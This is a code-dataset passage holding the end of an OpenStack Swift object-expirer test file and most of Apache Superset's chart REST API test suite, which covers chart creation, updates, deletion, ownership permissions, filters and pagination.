self.assertEqual(got_env[0]['PATH_INFO'], '/v1/path/to/object name')
def test_delete_actual_object_raises_404(self):
def fake_app(env, start_response):
start_response('404 Not Found', [('Content-Length', '0')])
return []
internal_client.loadapp = lambda *a, **kw: fake_app
x = expirer.ObjectExpirer({})
self.assertRaises(internal_client.UnexpectedResponse,
x.delete_actual_object, '/path/to/object', '1234')
def test_delete_actual_object_raises_412(self):
def fake_app(env, start_response):
start_response('412 Precondition Failed',
[('Content-Length', '0')])
return []
internal_client.loadapp = lambda *a, **kw: fake_app
x = expirer.ObjectExpirer({})
self.assertRaises(internal_client.UnexpectedResponse,
x.delete_actual_object, '/path/to/object', '1234')
def test_delete_actual_object_does_not_handle_odd_stuff(self):
def fake_app(env, start_response):
start_response(
                '503 Service Unavailable',
[('Content-Length', '0')])
return []
internal_client.loadapp = lambda *a, **kw: fake_app
x = expirer.ObjectExpirer({})
exc = None
try:
x.delete_actual_object('/path/to/object', '1234')
except Exception as err:
exc = err
finally:
pass
self.assertEqual(503, exc.resp.status_int)
def test_delete_actual_object_quotes(self):
name = 'this name should get quoted'
timestamp = '1366063156.863045'
x = expirer.ObjectExpirer({})
x.swift.make_request = mock.MagicMock()
x.delete_actual_object(name, timestamp)
self.assertEqual(x.swift.make_request.call_count, 1)
self.assertEqual(x.swift.make_request.call_args[0][1],
'/v1/' + urllib.parse.quote(name))
def test_pop_queue(self):
class InternalClient(object):
container_ring = FakeRing()
x = expirer.ObjectExpirer({}, logger=self.logger,
swift=InternalClient())
requests = []
def capture_requests(ipaddr, port, method, path, *args, **kwargs):
requests.append((method, path))
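        # One mocked 200 per container replica in the FakeRing; pop_queue should
        # DELETE the queue entry from every replica.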
with mocked_http_conn(
200, 200, 200, give_connect=capture_requests) as fake_conn:
x.pop_queue('c', 'o')
self.assertRaises(StopIteration, fake_conn.code_iter.next)
for method, path in requests:
self.assertEqual(method, 'DELETE')
device, part, account, container, obj = utils.split_path(
path, 5, 5, True)
self.assertEqual(account, '.expiring_objects')
self.assertEqual(container, 'c')
self.assertEqual(obj, 'o')
if __name__ == '__main__':
main()
| apache-2.0 | 5,540,752,920,553,979,000 | 34.861893 | 78 | 0.54525 | false |
apache/incubator-superset | tests/charts/api_tests.py | 1 | 62443 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# isort:skip_file
"""Unit tests for Superset"""
import json
from typing import List, Optional
from datetime import datetime
from io import BytesIO
from unittest import mock
from zipfile import is_zipfile, ZipFile
import humanize
import prison
import pytest
import yaml
from sqlalchemy import and_
from sqlalchemy.sql import func
from tests.test_app import app
from superset.charts.commands.data import ChartDataCommand
from superset.connectors.connector_registry import ConnectorRegistry
from superset.connectors.sqla.models import SqlaTable
from superset.extensions import async_query_manager, cache_manager, db, security_manager
from superset.models.annotations import AnnotationLayer
from superset.models.core import Database, FavStar, FavStarClassName
from superset.models.dashboard import Dashboard
from superset.models.reports import ReportSchedule, ReportScheduleType
from superset.models.slice import Slice
from superset.utils import core as utils
from superset.utils.core import AnnotationType, get_example_database
from tests.base_api_tests import ApiOwnersTestCaseMixin
from tests.base_tests import SupersetTestCase, post_assert_metric, test_client
from tests.fixtures.importexport import (
chart_config,
chart_metadata_config,
database_config,
dataset_config,
dataset_metadata_config,
)
from tests.fixtures.energy_dashboard import load_energy_table_with_slice
from tests.fixtures.query_context import get_query_context, ANNOTATION_LAYERS
from tests.fixtures.unicode_dashboard import load_unicode_dashboard_with_slice
from tests.annotation_layers.fixtures import create_annotation_layers
CHART_DATA_URI = "api/v1/chart/data"
CHARTS_FIXTURE_COUNT = 10
class TestChartApi(SupersetTestCase, ApiOwnersTestCaseMixin):
resource_name = "chart"
def insert_chart(
self,
slice_name: str,
owners: List[int],
datasource_id: int,
created_by=None,
datasource_type: str = "table",
description: Optional[str] = None,
viz_type: Optional[str] = None,
params: Optional[str] = None,
cache_timeout: Optional[int] = None,
) -> Slice:
obj_owners = list()
for owner in owners:
user = db.session.query(security_manager.user_model).get(owner)
obj_owners.append(user)
datasource = ConnectorRegistry.get_datasource(
datasource_type, datasource_id, db.session
)
slice = Slice(
cache_timeout=cache_timeout,
created_by=created_by,
datasource_id=datasource.id,
datasource_name=datasource.name,
datasource_type=datasource.type,
description=description,
owners=obj_owners,
params=params,
slice_name=slice_name,
viz_type=viz_type,
)
db.session.add(slice)
db.session.commit()
return slice
@pytest.fixture(autouse=True)
def clear_data_cache(self):
with app.app_context():
cache_manager.data_cache.clear()
yield
@pytest.fixture()
def create_charts(self):
with self.create_app().app_context():
charts = []
admin = self.get_user("admin")
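            # Insert CHARTS_FIXTURE_COUNT - 1 charts owned by admin, then favorite
            # roughly half of them for the favorite-filter tests.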
for cx in range(CHARTS_FIXTURE_COUNT - 1):
charts.append(self.insert_chart(f"name{cx}", [admin.id], 1))
fav_charts = []
for cx in range(round(CHARTS_FIXTURE_COUNT / 2)):
fav_star = FavStar(
user_id=admin.id, class_name="slice", obj_id=charts[cx].id
)
db.session.add(fav_star)
db.session.commit()
fav_charts.append(fav_star)
yield charts
# rollback changes
for chart in charts:
db.session.delete(chart)
for fav_chart in fav_charts:
db.session.delete(fav_chart)
db.session.commit()
@pytest.fixture()
def create_chart_with_report(self):
with self.create_app().app_context():
admin = self.get_user("admin")
chart = self.insert_chart(f"chart_report", [admin.id], 1)
report_schedule = ReportSchedule(
type=ReportScheduleType.REPORT,
name="report_with_chart",
crontab="* * * * *",
chart=chart,
)
db.session.commit()
yield chart
# rollback changes
db.session.delete(report_schedule)
db.session.delete(chart)
db.session.commit()
@pytest.fixture()
def add_dashboard_to_chart(self):
with self.create_app().app_context():
admin = self.get_user("admin")
self.chart = self.insert_chart("My chart", [admin.id], 1)
self.original_dashboard = Dashboard()
self.original_dashboard.dashboard_title = "Original Dashboard"
self.original_dashboard.slug = "slug"
self.original_dashboard.owners = [admin]
self.original_dashboard.slices = [self.chart]
self.original_dashboard.published = False
db.session.add(self.original_dashboard)
self.new_dashboard = Dashboard()
self.new_dashboard.dashboard_title = "New Dashboard"
self.new_dashboard.slug = "new_slug"
self.new_dashboard.owners = [admin]
self.new_dashboard.slices = []
self.new_dashboard.published = False
db.session.add(self.new_dashboard)
db.session.commit()
yield self.chart
db.session.delete(self.original_dashboard)
db.session.delete(self.new_dashboard)
db.session.delete(self.chart)
db.session.commit()
def test_info_security_chart(self):
"""
Chart API: Test info security
"""
self.login(username="admin")
params = {"keys": ["permissions"]}
uri = f"api/v1/chart/_info?q={prison.dumps(params)}"
rv = self.get_assert_metric(uri, "info")
data = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
assert "can_read" in data["permissions"]
assert "can_write" in data["permissions"]
assert len(data["permissions"]) == 2
def create_chart_import(self):
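        # Build an in-memory export ZIP bundle (metadata, database, dataset and
        # chart YAML files) used by the chart import tests.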
buf = BytesIO()
with ZipFile(buf, "w") as bundle:
with bundle.open("chart_export/metadata.yaml", "w") as fp:
fp.write(yaml.safe_dump(chart_metadata_config).encode())
with bundle.open(
"chart_export/databases/imported_database.yaml", "w"
) as fp:
fp.write(yaml.safe_dump(database_config).encode())
with bundle.open("chart_export/datasets/imported_dataset.yaml", "w") as fp:
fp.write(yaml.safe_dump(dataset_config).encode())
with bundle.open("chart_export/charts/imported_chart.yaml", "w") as fp:
fp.write(yaml.safe_dump(chart_config).encode())
buf.seek(0)
return buf
def test_delete_chart(self):
"""
Chart API: Test delete
"""
admin_id = self.get_user("admin").id
chart_id = self.insert_chart("name", [admin_id], 1).id
self.login(username="admin")
uri = f"api/v1/chart/{chart_id}"
rv = self.delete_assert_metric(uri, "delete")
self.assertEqual(rv.status_code, 200)
model = db.session.query(Slice).get(chart_id)
self.assertEqual(model, None)
def test_delete_bulk_charts(self):
"""
Chart API: Test delete bulk
"""
admin = self.get_user("admin")
chart_count = 4
chart_ids = list()
for chart_name_index in range(chart_count):
chart_ids.append(
self.insert_chart(f"title{chart_name_index}", [admin.id], 1, admin).id
)
self.login(username="admin")
argument = chart_ids
uri = f"api/v1/chart/?q={prison.dumps(argument)}"
rv = self.delete_assert_metric(uri, "bulk_delete")
self.assertEqual(rv.status_code, 200)
response = json.loads(rv.data.decode("utf-8"))
expected_response = {"message": f"Deleted {chart_count} charts"}
self.assertEqual(response, expected_response)
for chart_id in chart_ids:
model = db.session.query(Slice).get(chart_id)
self.assertEqual(model, None)
def test_delete_bulk_chart_bad_request(self):
"""
Chart API: Test delete bulk bad request
"""
chart_ids = [1, "a"]
self.login(username="admin")
argument = chart_ids
uri = f"api/v1/chart/?q={prison.dumps(argument)}"
rv = self.delete_assert_metric(uri, "bulk_delete")
self.assertEqual(rv.status_code, 400)
def test_delete_not_found_chart(self):
"""
Chart API: Test not found delete
"""
self.login(username="admin")
chart_id = 1000
uri = f"api/v1/chart/{chart_id}"
rv = self.delete_assert_metric(uri, "delete")
self.assertEqual(rv.status_code, 404)
@pytest.mark.usefixtures("create_chart_with_report")
def test_delete_chart_with_report(self):
"""
Chart API: Test delete with associated report
"""
self.login(username="admin")
chart = (
db.session.query(Slice)
.filter(Slice.slice_name == "chart_report")
.one_or_none()
)
uri = f"api/v1/chart/{chart.id}"
rv = self.client.delete(uri)
response = json.loads(rv.data.decode("utf-8"))
self.assertEqual(rv.status_code, 422)
expected_response = {
"message": "There are associated alerts or reports: report_with_chart"
}
self.assertEqual(response, expected_response)
def test_delete_bulk_charts_not_found(self):
"""
Chart API: Test delete bulk not found
"""
max_id = db.session.query(func.max(Slice.id)).scalar()
chart_ids = [max_id + 1, max_id + 2]
self.login(username="admin")
uri = f"api/v1/chart/?q={prison.dumps(chart_ids)}"
rv = self.delete_assert_metric(uri, "bulk_delete")
self.assertEqual(rv.status_code, 404)
@pytest.mark.usefixtures("create_chart_with_report", "create_charts")
def test_bulk_delete_chart_with_report(self):
"""
Chart API: Test bulk delete with associated report
"""
self.login(username="admin")
chart_with_report = (
db.session.query(Slice.id)
.filter(Slice.slice_name == "chart_report")
.one_or_none()
)
charts = db.session.query(Slice.id).filter(Slice.slice_name.like("name%")).all()
chart_ids = [chart.id for chart in charts]
chart_ids.append(chart_with_report.id)
uri = f"api/v1/chart/?q={prison.dumps(chart_ids)}"
rv = self.client.delete(uri)
response = json.loads(rv.data.decode("utf-8"))
self.assertEqual(rv.status_code, 422)
expected_response = {
"message": "There are associated alerts or reports: report_with_chart"
}
self.assertEqual(response, expected_response)
def test_delete_chart_admin_not_owned(self):
"""
Chart API: Test admin delete not owned
"""
gamma_id = self.get_user("gamma").id
chart_id = self.insert_chart("title", [gamma_id], 1).id
self.login(username="admin")
uri = f"api/v1/chart/{chart_id}"
rv = self.delete_assert_metric(uri, "delete")
self.assertEqual(rv.status_code, 200)
model = db.session.query(Slice).get(chart_id)
self.assertEqual(model, None)
def test_delete_bulk_chart_admin_not_owned(self):
"""
Chart API: Test admin delete bulk not owned
"""
gamma_id = self.get_user("gamma").id
chart_count = 4
chart_ids = list()
for chart_name_index in range(chart_count):
chart_ids.append(
self.insert_chart(f"title{chart_name_index}", [gamma_id], 1).id
)
self.login(username="admin")
argument = chart_ids
uri = f"api/v1/chart/?q={prison.dumps(argument)}"
rv = self.delete_assert_metric(uri, "bulk_delete")
response = json.loads(rv.data.decode("utf-8"))
self.assertEqual(rv.status_code, 200)
expected_response = {"message": f"Deleted {chart_count} charts"}
self.assertEqual(response, expected_response)
for chart_id in chart_ids:
model = db.session.query(Slice).get(chart_id)
self.assertEqual(model, None)
def test_delete_chart_not_owned(self):
"""
Chart API: Test delete try not owned
"""
user_alpha1 = self.create_user(
"alpha1", "password", "Alpha", email="[email protected]"
)
user_alpha2 = self.create_user(
"alpha2", "password", "Alpha", email="[email protected]"
)
chart = self.insert_chart("title", [user_alpha1.id], 1)
self.login(username="alpha2", password="password")
uri = f"api/v1/chart/{chart.id}"
rv = self.delete_assert_metric(uri, "delete")
self.assertEqual(rv.status_code, 403)
db.session.delete(chart)
db.session.delete(user_alpha1)
db.session.delete(user_alpha2)
db.session.commit()
def test_delete_bulk_chart_not_owned(self):
"""
Chart API: Test delete bulk try not owned
"""
user_alpha1 = self.create_user(
"alpha1", "password", "Alpha", email="[email protected]"
)
user_alpha2 = self.create_user(
"alpha2", "password", "Alpha", email="[email protected]"
)
chart_count = 4
charts = list()
for chart_name_index in range(chart_count):
charts.append(
self.insert_chart(f"title{chart_name_index}", [user_alpha1.id], 1)
)
owned_chart = self.insert_chart("title_owned", [user_alpha2.id], 1)
self.login(username="alpha2", password="password")
        # verify we can't delete charts we don't own
arguments = [chart.id for chart in charts]
uri = f"api/v1/chart/?q={prison.dumps(arguments)}"
rv = self.delete_assert_metric(uri, "bulk_delete")
self.assertEqual(rv.status_code, 403)
response = json.loads(rv.data.decode("utf-8"))
expected_response = {"message": "Forbidden"}
self.assertEqual(response, expected_response)
        # nothing is deleted in bulk when the list mixes owned and not-owned charts
arguments = [chart.id for chart in charts] + [owned_chart.id]
uri = f"api/v1/chart/?q={prison.dumps(arguments)}"
rv = self.delete_assert_metric(uri, "bulk_delete")
self.assertEqual(rv.status_code, 403)
response = json.loads(rv.data.decode("utf-8"))
expected_response = {"message": "Forbidden"}
self.assertEqual(response, expected_response)
for chart in charts:
db.session.delete(chart)
db.session.delete(owned_chart)
db.session.delete(user_alpha1)
db.session.delete(user_alpha2)
db.session.commit()
def test_create_chart(self):
"""
Chart API: Test create chart
"""
admin_id = self.get_user("admin").id
chart_data = {
"slice_name": "name1",
"description": "description1",
"owners": [admin_id],
"viz_type": "viz_type1",
"params": "1234",
"cache_timeout": 1000,
"datasource_id": 1,
"datasource_type": "table",
"dashboards": [1, 2],
}
self.login(username="admin")
uri = f"api/v1/chart/"
rv = self.post_assert_metric(uri, chart_data, "post")
self.assertEqual(rv.status_code, 201)
data = json.loads(rv.data.decode("utf-8"))
model = db.session.query(Slice).get(data.get("id"))
db.session.delete(model)
db.session.commit()
def test_create_simple_chart(self):
"""
Chart API: Test create simple chart
"""
chart_data = {
"slice_name": "title1",
"datasource_id": 1,
"datasource_type": "table",
}
self.login(username="admin")
uri = f"api/v1/chart/"
rv = self.post_assert_metric(uri, chart_data, "post")
self.assertEqual(rv.status_code, 201)
data = json.loads(rv.data.decode("utf-8"))
model = db.session.query(Slice).get(data.get("id"))
db.session.delete(model)
db.session.commit()
def test_create_chart_validate_owners(self):
"""
Chart API: Test create validate owners
"""
chart_data = {
"slice_name": "title1",
"datasource_id": 1,
"datasource_type": "table",
"owners": [1000],
}
self.login(username="admin")
uri = f"api/v1/chart/"
rv = self.post_assert_metric(uri, chart_data, "post")
self.assertEqual(rv.status_code, 422)
response = json.loads(rv.data.decode("utf-8"))
expected_response = {"message": {"owners": ["Owners are invalid"]}}
self.assertEqual(response, expected_response)
def test_create_chart_validate_params(self):
"""
Chart API: Test create validate params json
"""
chart_data = {
"slice_name": "title1",
"datasource_id": 1,
"datasource_type": "table",
"params": '{"A:"a"}',
}
self.login(username="admin")
uri = f"api/v1/chart/"
rv = self.post_assert_metric(uri, chart_data, "post")
self.assertEqual(rv.status_code, 400)
def test_create_chart_validate_datasource(self):
"""
Chart API: Test create validate datasource
"""
self.login(username="admin")
chart_data = {
"slice_name": "title1",
"datasource_id": 1,
"datasource_type": "unknown",
}
uri = f"api/v1/chart/"
rv = self.post_assert_metric(uri, chart_data, "post")
self.assertEqual(rv.status_code, 400)
response = json.loads(rv.data.decode("utf-8"))
self.assertEqual(
response,
{"message": {"datasource_type": ["Must be one of: druid, table, view."]}},
)
chart_data = {
"slice_name": "title1",
"datasource_id": 0,
"datasource_type": "table",
}
uri = f"api/v1/chart/"
rv = self.post_assert_metric(uri, chart_data, "post")
self.assertEqual(rv.status_code, 422)
response = json.loads(rv.data.decode("utf-8"))
self.assertEqual(
response, {"message": {"datasource_id": ["Datasource does not exist"]}}
)
def test_update_chart(self):
"""
Chart API: Test update
"""
admin = self.get_user("admin")
gamma = self.get_user("gamma")
chart_id = self.insert_chart("title", [admin.id], 1, admin).id
birth_names_table_id = SupersetTestCase.get_table_by_name("birth_names").id
chart_data = {
"slice_name": "title1_changed",
"description": "description1",
"owners": [gamma.id],
"viz_type": "viz_type1",
"params": """{"a": 1}""",
"cache_timeout": 1000,
"datasource_id": birth_names_table_id,
"datasource_type": "table",
"dashboards": [1],
}
self.login(username="admin")
uri = f"api/v1/chart/{chart_id}"
rv = self.put_assert_metric(uri, chart_data, "put")
self.assertEqual(rv.status_code, 200)
model = db.session.query(Slice).get(chart_id)
related_dashboard = db.session.query(Dashboard).get(1)
self.assertEqual(model.created_by, admin)
self.assertEqual(model.slice_name, "title1_changed")
self.assertEqual(model.description, "description1")
self.assertIn(admin, model.owners)
self.assertIn(gamma, model.owners)
self.assertEqual(model.viz_type, "viz_type1")
self.assertEqual(model.params, """{"a": 1}""")
self.assertEqual(model.cache_timeout, 1000)
self.assertEqual(model.datasource_id, birth_names_table_id)
self.assertEqual(model.datasource_type, "table")
self.assertEqual(model.datasource_name, "birth_names")
self.assertIn(related_dashboard, model.dashboards)
db.session.delete(model)
db.session.commit()
def test_update_chart_new_owner(self):
"""
Chart API: Test update set new owner to current user
"""
gamma = self.get_user("gamma")
admin = self.get_user("admin")
chart_id = self.insert_chart("title", [gamma.id], 1).id
chart_data = {"slice_name": "title1_changed"}
self.login(username="admin")
uri = f"api/v1/chart/{chart_id}"
rv = self.put_assert_metric(uri, chart_data, "put")
self.assertEqual(rv.status_code, 200)
model = db.session.query(Slice).get(chart_id)
self.assertIn(admin, model.owners)
db.session.delete(model)
db.session.commit()
@pytest.mark.usefixtures("add_dashboard_to_chart")
def test_update_chart_new_dashboards(self):
"""
        Chart API: Test update chart changing dashboards
"""
chart_data = {
"slice_name": "title1_changed",
"dashboards": [self.new_dashboard.id],
}
self.login(username="admin")
uri = f"api/v1/chart/{self.chart.id}"
rv = self.put_assert_metric(uri, chart_data, "put")
self.assertEqual(rv.status_code, 200)
self.assertIn(self.new_dashboard, self.chart.dashboards)
self.assertNotIn(self.original_dashboard, self.chart.dashboards)
@pytest.mark.usefixtures("add_dashboard_to_chart")
def test_not_update_chart_none_dashboards(self):
"""
        Chart API: Test update chart without dashboards keeps existing dashboards
"""
chart_data = {"slice_name": "title1_changed_again"}
self.login(username="admin")
uri = f"api/v1/chart/{self.chart.id}"
rv = self.put_assert_metric(uri, chart_data, "put")
self.assertEqual(rv.status_code, 200)
self.assertIn(self.original_dashboard, self.chart.dashboards)
self.assertEqual(len(self.chart.dashboards), 1)
def test_update_chart_not_owned(self):
"""
Chart API: Test update not owned
"""
user_alpha1 = self.create_user(
"alpha1", "password", "Alpha", email="[email protected]"
)
user_alpha2 = self.create_user(
"alpha2", "password", "Alpha", email="[email protected]"
)
chart = self.insert_chart("title", [user_alpha1.id], 1)
self.login(username="alpha2", password="password")
chart_data = {"slice_name": "title1_changed"}
uri = f"api/v1/chart/{chart.id}"
rv = self.put_assert_metric(uri, chart_data, "put")
self.assertEqual(rv.status_code, 403)
db.session.delete(chart)
db.session.delete(user_alpha1)
db.session.delete(user_alpha2)
db.session.commit()
def test_update_chart_validate_datasource(self):
"""
Chart API: Test update validate datasource
"""
admin = self.get_user("admin")
chart = self.insert_chart("title", [admin.id], 1)
self.login(username="admin")
chart_data = {"datasource_id": 1, "datasource_type": "unknown"}
uri = f"api/v1/chart/{chart.id}"
rv = self.put_assert_metric(uri, chart_data, "put")
self.assertEqual(rv.status_code, 400)
response = json.loads(rv.data.decode("utf-8"))
self.assertEqual(
response,
{"message": {"datasource_type": ["Must be one of: druid, table, view."]}},
)
chart_data = {"datasource_id": 0, "datasource_type": "table"}
uri = f"api/v1/chart/{chart.id}"
rv = self.put_assert_metric(uri, chart_data, "put")
self.assertEqual(rv.status_code, 422)
response = json.loads(rv.data.decode("utf-8"))
self.assertEqual(
response, {"message": {"datasource_id": ["Datasource does not exist"]}}
)
db.session.delete(chart)
db.session.commit()
def test_update_chart_validate_owners(self):
"""
Chart API: Test update validate owners
"""
chart_data = {
"slice_name": "title1",
"datasource_id": 1,
"datasource_type": "table",
"owners": [1000],
}
self.login(username="admin")
uri = f"api/v1/chart/"
rv = self.client.post(uri, json=chart_data)
self.assertEqual(rv.status_code, 422)
response = json.loads(rv.data.decode("utf-8"))
expected_response = {"message": {"owners": ["Owners are invalid"]}}
self.assertEqual(response, expected_response)
def test_get_chart(self):
"""
Chart API: Test get chart
"""
admin = self.get_user("admin")
chart = self.insert_chart("title", [admin.id], 1)
self.login(username="admin")
uri = f"api/v1/chart/{chart.id}"
rv = self.get_assert_metric(uri, "get")
self.assertEqual(rv.status_code, 200)
expected_result = {
"cache_timeout": None,
"dashboards": [],
"description": None,
"owners": [
{
"id": 1,
"username": "admin",
"first_name": "admin",
"last_name": "user",
}
],
"params": None,
"slice_name": "title",
"viz_type": None,
}
data = json.loads(rv.data.decode("utf-8"))
self.assertEqual(data["result"], expected_result)
db.session.delete(chart)
db.session.commit()
def test_get_chart_not_found(self):
"""
Chart API: Test get chart not found
"""
chart_id = 1000
self.login(username="admin")
uri = f"api/v1/chart/{chart_id}"
rv = self.get_assert_metric(uri, "get")
self.assertEqual(rv.status_code, 404)
def test_get_chart_no_data_access(self):
"""
Chart API: Test get chart without data access
"""
self.login(username="gamma")
chart_no_access = (
db.session.query(Slice)
.filter_by(slice_name="Girl Name Cloud")
.one_or_none()
)
uri = f"api/v1/chart/{chart_no_access.id}"
rv = self.client.get(uri)
self.assertEqual(rv.status_code, 404)
@pytest.mark.usefixtures("load_unicode_dashboard_with_slice")
@pytest.mark.usefixtures("load_energy_table_with_slice")
def test_get_charts(self):
"""
Chart API: Test get charts
"""
self.login(username="admin")
uri = f"api/v1/chart/"
rv = self.get_assert_metric(uri, "get_list")
self.assertEqual(rv.status_code, 200)
data = json.loads(rv.data.decode("utf-8"))
self.assertEqual(data["count"], 33)
def test_get_charts_changed_on(self):
"""
        Chart API: Test get charts changed on
"""
admin = self.get_user("admin")
start_changed_on = datetime.now()
chart = self.insert_chart("foo_a", [admin.id], 1, description="ZY_bar")
self.login(username="admin")
arguments = {
"order_column": "changed_on_delta_humanized",
"order_direction": "desc",
}
uri = f"api/v1/chart/?q={prison.dumps(arguments)}"
rv = self.get_assert_metric(uri, "get_list")
self.assertEqual(rv.status_code, 200)
data = json.loads(rv.data.decode("utf-8"))
self.assertEqual(
data["result"][0]["changed_on_delta_humanized"],
humanize.naturaltime(datetime.now() - start_changed_on),
)
# rollback changes
db.session.delete(chart)
db.session.commit()
def test_get_charts_filter(self):
"""
Chart API: Test get charts filter
"""
self.login(username="admin")
arguments = {"filters": [{"col": "slice_name", "opr": "sw", "value": "G"}]}
uri = f"api/v1/chart/?q={prison.dumps(arguments)}"
rv = self.get_assert_metric(uri, "get_list")
self.assertEqual(rv.status_code, 200)
data = json.loads(rv.data.decode("utf-8"))
self.assertEqual(data["count"], 5)
@pytest.fixture()
def load_energy_charts(self):
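        # Create five charts against the energy_usage table whose names,
        # descriptions and viz types exercise the chart_all_text filter.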
with app.app_context():
admin = self.get_user("admin")
energy_table = (
db.session.query(SqlaTable)
.filter_by(table_name="energy_usage")
.one_or_none()
)
energy_table_id = 1
if energy_table:
energy_table_id = energy_table.id
chart1 = self.insert_chart(
"foo_a", [admin.id], energy_table_id, description="ZY_bar"
)
chart2 = self.insert_chart(
"zy_foo", [admin.id], energy_table_id, description="desc1"
)
chart3 = self.insert_chart(
"foo_b", [admin.id], energy_table_id, description="desc1zy_"
)
chart4 = self.insert_chart(
"foo_c", [admin.id], energy_table_id, viz_type="viz_zy_"
)
chart5 = self.insert_chart(
"bar", [admin.id], energy_table_id, description="foo"
)
yield
# rollback changes
db.session.delete(chart1)
db.session.delete(chart2)
db.session.delete(chart3)
db.session.delete(chart4)
db.session.delete(chart5)
db.session.commit()
@pytest.mark.usefixtures("load_energy_charts")
def test_get_charts_custom_filter(self):
"""
Chart API: Test get charts custom filter
"""
arguments = {
"filters": [{"col": "slice_name", "opr": "chart_all_text", "value": "zy_"}],
"order_column": "slice_name",
"order_direction": "asc",
"keys": ["none"],
"columns": ["slice_name", "description", "viz_type"],
}
self.login(username="admin")
uri = f"api/v1/chart/?q={prison.dumps(arguments)}"
rv = self.get_assert_metric(uri, "get_list")
self.assertEqual(rv.status_code, 200)
data = json.loads(rv.data.decode("utf-8"))
self.assertEqual(data["count"], 4)
expected_response = [
{"description": "ZY_bar", "slice_name": "foo_a", "viz_type": None},
{"description": "desc1zy_", "slice_name": "foo_b", "viz_type": None},
{"description": None, "slice_name": "foo_c", "viz_type": "viz_zy_"},
{"description": "desc1", "slice_name": "zy_foo", "viz_type": None},
]
for index, item in enumerate(data["result"]):
self.assertEqual(
item["description"], expected_response[index]["description"]
)
self.assertEqual(item["slice_name"], expected_response[index]["slice_name"])
self.assertEqual(item["viz_type"], expected_response[index]["viz_type"])
@pytest.mark.usefixtures("load_energy_table_with_slice", "load_energy_charts")
def test_admin_gets_filtered_energy_slices(self):
# test filtering on datasource_name
arguments = {
"filters": [
{"col": "slice_name", "opr": "chart_all_text", "value": "energy",}
],
"keys": ["none"],
"columns": ["slice_name"],
}
self.login(username="admin")
uri = f"api/v1/chart/?q={prison.dumps(arguments)}"
rv = self.get_assert_metric(uri, "get_list")
self.assertEqual(rv.status_code, 200)
data = json.loads(rv.data.decode("utf-8"))
self.assertEqual(data["count"], 8)
@pytest.mark.usefixtures("load_energy_charts")
def test_user_gets_none_filtered_energy_slices(self):
# test filtering on datasource_name
arguments = {
"filters": [
{"col": "slice_name", "opr": "chart_all_text", "value": "energy",}
],
"keys": ["none"],
"columns": ["slice_name"],
}
self.login(username="gamma")
uri = f"api/v1/chart/?q={prison.dumps(arguments)}"
rv = self.get_assert_metric(uri, "get_list")
self.assertEqual(rv.status_code, 200)
data = json.loads(rv.data.decode("utf-8"))
self.assertEqual(data["count"], 0)
@pytest.mark.usefixtures("create_charts")
def test_get_charts_favorite_filter(self):
"""
Chart API: Test get charts favorite filter
"""
admin = self.get_user("admin")
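        # Subquery of chart ids the admin user has marked as favorite.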
users_favorite_query = db.session.query(FavStar.obj_id).filter(
and_(FavStar.user_id == admin.id, FavStar.class_name == "slice")
)
expected_models = (
db.session.query(Slice)
.filter(and_(Slice.id.in_(users_favorite_query)))
.order_by(Slice.slice_name.asc())
.all()
)
arguments = {
"filters": [{"col": "id", "opr": "chart_is_favorite", "value": True}],
"order_column": "slice_name",
"order_direction": "asc",
"keys": ["none"],
"columns": ["slice_name"],
}
self.login(username="admin")
uri = f"api/v1/chart/?q={prison.dumps(arguments)}"
rv = self.client.get(uri)
data = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
assert len(expected_models) == data["count"]
for i, expected_model in enumerate(expected_models):
assert expected_model.slice_name == data["result"][i]["slice_name"]
# Test not favorite charts
expected_models = (
db.session.query(Slice)
.filter(and_(~Slice.id.in_(users_favorite_query)))
.order_by(Slice.slice_name.asc())
.all()
)
arguments["filters"][0]["value"] = False
uri = f"api/v1/chart/?q={prison.dumps(arguments)}"
rv = self.client.get(uri)
data = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
assert len(expected_models) == data["count"]
@pytest.mark.usefixtures("create_charts")
def test_get_current_user_favorite_status(self):
"""
        Chart API: Test get current user favorite status
"""
admin = self.get_user("admin")
users_favorite_ids = [
star.obj_id
for star in db.session.query(FavStar.obj_id)
.filter(
and_(
FavStar.user_id == admin.id,
FavStar.class_name == FavStarClassName.CHART,
)
)
.all()
]
assert users_favorite_ids
arguments = [s.id for s in db.session.query(Slice.id).all()]
self.login(username="admin")
uri = f"api/v1/chart/favorite_status/?q={prison.dumps(arguments)}"
rv = self.client.get(uri)
data = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
for res in data["result"]:
if res["id"] in users_favorite_ids:
assert res["value"]
def test_get_time_range(self):
"""
        Chart API: Test get the actual time range from a human-readable string
"""
self.login(username="admin")
humanize_time_range = "100 years ago : now"
uri = f"api/v1/time_range/?q={prison.dumps(humanize_time_range)}"
rv = self.client.get(uri)
data = json.loads(rv.data.decode("utf-8"))
self.assertEqual(rv.status_code, 200)
self.assertEqual(len(data["result"]), 3)
@pytest.mark.usefixtures(
"load_unicode_dashboard_with_slice", "load_energy_table_with_slice"
)
def test_get_charts_page(self):
"""
        Chart API: Test get charts pagination
"""
# Assuming we have 33 sample charts
self.login(username="admin")
arguments = {"page_size": 10, "page": 0}
uri = f"api/v1/chart/?q={prison.dumps(arguments)}"
rv = self.client.get(uri)
self.assertEqual(rv.status_code, 200)
data = json.loads(rv.data.decode("utf-8"))
self.assertEqual(len(data["result"]), 10)
arguments = {"page_size": 10, "page": 3}
uri = f"api/v1/chart/?q={prison.dumps(arguments)}"
rv = self.get_assert_metric(uri, "get_list")
self.assertEqual(rv.status_code, 200)
data = json.loads(rv.data.decode("utf-8"))
self.assertEqual(len(data["result"]), 3)
def test_get_charts_no_data_access(self):
"""
Chart API: Test get charts no data access
"""
self.login(username="gamma")
uri = f"api/v1/chart/"
rv = self.get_assert_metric(uri, "get_list")
self.assertEqual(rv.status_code, 200)
data = json.loads(rv.data.decode("utf-8"))
self.assertEqual(data["count"], 0)
def test_chart_data_simple(self):
"""
Chart data API: Test chart data query
"""
self.login(username="admin")
request_payload = get_query_context("birth_names")
